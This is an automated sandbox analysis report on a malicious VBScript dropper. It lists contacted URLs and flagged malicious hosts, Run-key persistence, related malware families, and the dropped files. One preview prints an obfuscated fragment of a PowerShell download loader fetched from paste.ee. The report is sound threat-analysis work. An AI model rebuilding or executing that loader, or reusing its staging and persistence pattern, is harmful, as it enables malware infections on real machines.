https://contoso.com/	powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/	wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		low
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2921006320.000002209C906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2910379828.000002793BDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2921006320.000002209C91A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/d/FIwXaok	wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.187.200	paste.ee	United States	13335	CLOUDFLARENETUS	false
134.255.217.251	aprilxrwonew8450.duckdns.org	Germany	197071	ACTIVE-SERVERSactive-serverscomDE	true
116.206.104.215	pantherropes.com	Seychelles	394695	PUBLIC-DOMAIN-REGISTRYUS	true
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430116
Start date and time:	2024-04-23 07:52:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	72625413524.vbs
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winVBS@13/10@8/4
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3140 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6528 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:53:25	API Interceptor	42x Sleep call for process: powershell.exe modified
07:53:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name_File.vbs
07:53:35	API Interceptor	2115766x Sleep call for process: RegAsm.exe modified
07:53:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name_File.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.187.200	EWW.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/gFlKP
	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/JxxYu
	Purchase Order PO0193832.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/Bpplq
	Name.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/0kkOm
	517209487.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/s0kJG
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/GoCAw
	66432890.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/D6Uw6
	96874650.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/yj4hE
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse	paste.ee/d/QkK2f
	751652433.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/0BSaJ
116.206.104.215	F723838674.vbs	Get hash	malicious	Remcos	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse
	http://padmavathitravels.com	Get hash	malicious	Unknown	Browse
172.67.215.45	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse
	Payment Advice for Invoice 2024 0904.vbs	Get hash	malicious	FormBook	Browse
	TNT Invoicing_pdf.vbs	Get hash	malicious	FormBook	Browse
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse
	P.O.109961.xls	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf	Get hash	malicious	Remcos	Browse
	SOA APR24.xls	Get hash	malicious	Remcos	Browse
	2Qvb8zqdPF.rtf	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	mWimHae6l9.exe	Get hash	malicious	Unknown	Browse	172.67.187.200
	UmJMWJPQ9h.exe	Get hash	malicious	XWorm	Browse	172.67.187.200
	GPgMeqI8Gy.exe	Get hash	malicious	XWorm	Browse	104.21.84.67
	E3XzKxHCCb.exe	Get hash	malicious	XWorm	Browse	172.67.187.200
	mWimHae6l9.exe	Get hash	malicious	Unknown	Browse	104.21.84.67
	UmJMWJPQ9h.exe	Get hash	malicious	XWorm	Browse	104.21.84.67
	GPgMeqI8Gy.exe	Get hash	malicious	XWorm	Browse	104.21.84.67
	E3XzKxHCCb.exe	Get hash	malicious	XWorm	Browse	172.67.187.200
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.187.200
pantherropes.com	F723838674.vbs	Get hash	malicious	Remcos	Browse	116.206.104.215
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse	116.206.104.215
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse	116.206.104.215
uploaddeimagens.com.br	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.45.138
	F723838674.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.45.138
	F723838674.vbs	Get hash	malicious	Remcos	Browse	104.21.45.138
	DHL Receipt_pdf.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	HDPESDR11OD5606METERS.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	SecuriteInfo.com.MSIL.Kryptik.AGUH.tr.13955.20631.exe	Get hash	malicious	AgentTesla	Browse	162.215.248.214
	HDPESDR1145-6METERS.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	TT copy of the first payment.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	111.118.215.174
	Scan Copy 0092316282.exe	Get hash	malicious	AgentTesla	Browse	162.215.248.214
	file.exe	Get hash	malicious	LummaC	Browse	216.10.247.145
	rTDN001-180424_PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.199.224
	1iO53raUh69l6nV.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	INVOICE pdf.wsf	Get hash	malicious	GuLoader	Browse	216.10.249.248
ACTIVE-SERVERSactive-serverscomDE	ft1i6jvAdD.exe	Get hash	malicious	Xmrig	Browse	134.255.231.136
	huhu.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	95.156.228.183
	1B8943B2CCEA3EE9E464B5865711DB721BAE33CA03646.exe	Get hash	malicious	BazaLoader, SmokeLoader	Browse	134.255.232.95
	Summaryform_XsssmAVjTv.wsf	Get hash	malicious	AsyncRAT, zgRAT	Browse	134.255.225.46
	http://vps-zap756882-1.zap-srv.com	Get hash	malicious	Unknown	Browse	134.255.234.208
	3fB3EuUEe7.exe	Get hash	malicious	Quasar	Browse	134.255.254.225
	dl2.exe	Get hash	malicious	Unknown	Browse	31.214.240.203
	mpsl.elf	Get hash	malicious	Mirai	Browse	95.156.228.199
	KY40Vey3Ml.elf	Get hash	malicious	Mirai	Browse	95.156.228.196
	file.exe	Get hash	malicious	Quasar	Browse	134.255.254.134
CLOUDFLARENETUS	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	172.67.134.136
	https://universewild.org	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpU	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://myidealwedding.com.au	Get hash	malicious	BitRAT, HTMLPhisher	Browse	104.17.25.14
	QUOTE RNP002673CC1F68.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.html	Get hash	malicious	HTMLPhisher	Browse	104.18.2.35
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	104.17.25.14
CLOUDFLARENETUS	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	172.67.134.136
	https://universewild.org	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpU	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://myidealwedding.com.au	Get hash	malicious	BitRAT, HTMLPhisher	Browse	104.17.25.14
	QUOTE RNP002673CC1F68.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.html	Get hash	malicious	HTMLPhisher	Browse	104.18.2.35
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45 116.206.104.215
	Shipping Document_PDF.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45 116.206.104.215
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	172.67.215.45 116.206.104.215
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	172.67.215.45 116.206.104.215
	QUOTE RNP002673CC1F68.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 116.206.104.215
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	172.67.215.45 116.206.104.215
	https://secure.rightsignature.com/signers/72685de1-0891-4676-ba51-0639e8aac386/sign?identity_token=e9BkbAE3-a65UvyeRkxL	Get hash	malicious	HTMLPhisher	Browse	172.67.215.45 116.206.104.215
	FreeTemplates_46070101.msi	Get hash	malicious	Unknown	Browse	172.67.215.45 116.206.104.215
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 116.206.104.215
	rPayment_AdviceJ001222042024.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.215.45 116.206.104.215
37f463bf4616ecd445d4a1937da06e19	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	232_786.msi	Get hash	malicious	Unknown	Browse	172.67.187.200
	file.exe	Get hash	malicious	Vidar	Browse	172.67.187.200
	file.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	172.67.187.200
	FINAL CMR.-Transportauftrag Nachlauf new.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.67.187.200
	CE1KVxYp5t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.187.200
	Ve6VeFSgkz.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.187.200
	FreeTemplates_46070101.msi	Get hash	malicious	Unknown	Browse	172.67.187.200
	rPayment_AdviceJ001222042024.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.187.200
	FreeTemplates_46069972.msi	Get hash	malicious	Unknown	Browse	172.67.187.200

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	204074
Entropy (8bit):	5.16860231694857
Encrypted:	false
SSDEEP:	3072:A5yO1lQ014Cet1ns3wflGsZcfwMQA5PGzb8h9:A591lF1UflGsZcfb
MD5:	85CBF9B1A0E3D8FDA14A86535E0692D9
SHA1:	695EAA69C8766E01720DEC322064EE968812F264
SHA-256:	AD4AC01243A9775D26945CF742A06ACB03F34056FEE9576D646FF65617BF94F5
SHA-512:	0EECAD4E71E37B7D387938388D30589D7AE737885EB14F83813F85F9B910AC339BA8E37A9418A050AB842E0298142A5061092A261D1CF1B4C0500E6A64E84C52
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FIwXa[1].txt

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11434), with CRLF line terminators
Category:	dropped
Size (bytes):	13424
Entropy (8bit):	4.816835217294904
Encrypted:	false
SSDEEP:	384:Gli/w85Z/lg3ygFD5vV9riJuWVabisK4VabisK1M9MobXRS1Y7g/+PQVd+mDE7Xm:WViQW2KGPgNFGnp3Fu3scKV1GGvf
MD5:	FFDFE26D8F87C94AA7AFA9AA2A81D17A
SHA1:	4A432DB9B2EDA9E9AB824D432D625969CAE40E27
SHA-256:	F9549D5EA907392427C70982212941D6BD9042912BB87BE849D624FC9CB25D7B
SHA-512:	32D5282E7CA270924982969E695C67870619D5A9E22B768039BB522A1233C55B5B8FA1303F891444C5FC74D280B09E25400D1EF45F2DDD8694D87901C0C1A4D9
Malicious:	false
Reputation:	low
Preview:	.. dim estrige , calondro , iristomia , matozinhos , sumelga , Cama , sumelga1.. calondro = " ".. iristomia = "" & matozinhos & calondro & matozinhos & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & matozinhos & calondro & matozinhos & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & matozinhos & calondro & matozinhos & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & matozinhos & calondro & matozinhos & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & matozinhos & calondro & matozinhos & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & matozinhos & calondro & matozinhos & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre"

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul774/lL:NllUwt
MD5:	3BD40D4BDD7802424FE8F2DC2A41C196
SHA1:	88F355EA9D58C5A00B2EBB0DC3127C0C13052631
SHA-256:	FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
SHA-512:	67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\Log.tmp

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11ldtlxc.acp.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd31duw1.ibv.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_extqx3t3.y0o.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb2iogtw.rhj.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spsywtsd.5l0.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w14w42uu.3wx.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
